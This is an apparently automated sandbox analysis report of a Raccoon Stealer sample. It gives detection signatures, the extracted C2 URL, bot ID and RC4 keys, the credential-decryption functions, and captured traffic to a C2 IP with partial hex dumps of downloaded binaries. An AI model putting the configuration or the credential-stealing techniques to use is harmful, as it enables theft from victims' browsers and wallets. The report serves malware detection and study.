Loading ...

Play interactive tourEdit tour

Windows Analysis Report KnZsSmDyF3.exe

Overview

General Information

Sample Name:KnZsSmDyF3.exe
Analysis ID:452449
MD5:aa717550158faf72a3776ce7115f80d3
SHA1:6d0bbf0b16b7f9e5948c18f488b5428b329821f3
SHA256:b61998322190573353437177fd9a48263cae5d867055800d86b5fcf006253fdc
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Raccoon Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to steal Internet Explorer form passwords
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • KnZsSmDyF3.exe (PID: 4712 cmdline: 'C:\Users\user\Desktop\KnZsSmDyF3.exe' MD5: AA717550158FAF72A3776CE7115F80D3)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
    00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
        Process Memory Space: KnZsSmDyF3.exe PID: 4712JoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
          Process Memory Space: KnZsSmDyF3.exe PID: 4712JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.KnZsSmDyF3.exe.400000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
              1.2.KnZsSmDyF3.exe.400000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                  1.3.KnZsSmDyF3.exe.2770000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                    1.2.KnZsSmDyF3.exe.2670e50.4.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpackMalware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: telete.inVirustotal: Detection: 12%Perma Link
                      Source: https://telete.in/jagressor_kzVirustotal: Detection: 12%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: KnZsSmDyF3.exeVirustotal: Detection: 62%Perma Link
                      Source: KnZsSmDyF3.exeMetadefender: Detection: 28%Perma Link
                      Source: KnZsSmDyF3.exeReversingLabs: Detection: 75%
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY
                      Machine Learning detection for sampleShow sources
                      Source: KnZsSmDyF3.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040CD04 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,1_2_0040CD04
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040EE22 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,1_2_0040EE22
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040D407 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,1_2_0040D407
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004274BC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,1_2_004274BC
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0042768F lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,1_2_0042768F
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040DE52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,1_2_0040DE52
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040C12D __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,1_2_0040C12D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041E61E __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,1_2_0041E61E

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeUnpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack
                      Source: KnZsSmDyF3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
                      Source: Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
                      Source: Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0043BDC7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_0043BDC7
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004329F2 __EH_prolog,GetLogicalDriveStringsA,1_2_004329F2
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: https://telete.in/jagressor_kz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:00 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:06 GMTETag: "60e9b7d6-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197
                      Source: global trafficHTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
                      Source: global trafficHTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1392Host: 94.228.114.197
                      Source: Joe Sandbox ViewIP Address: 195.201.225.248 195.201.225.248
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.228.114.197
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:04 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:05 GMTETag: "60e9b7d5-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
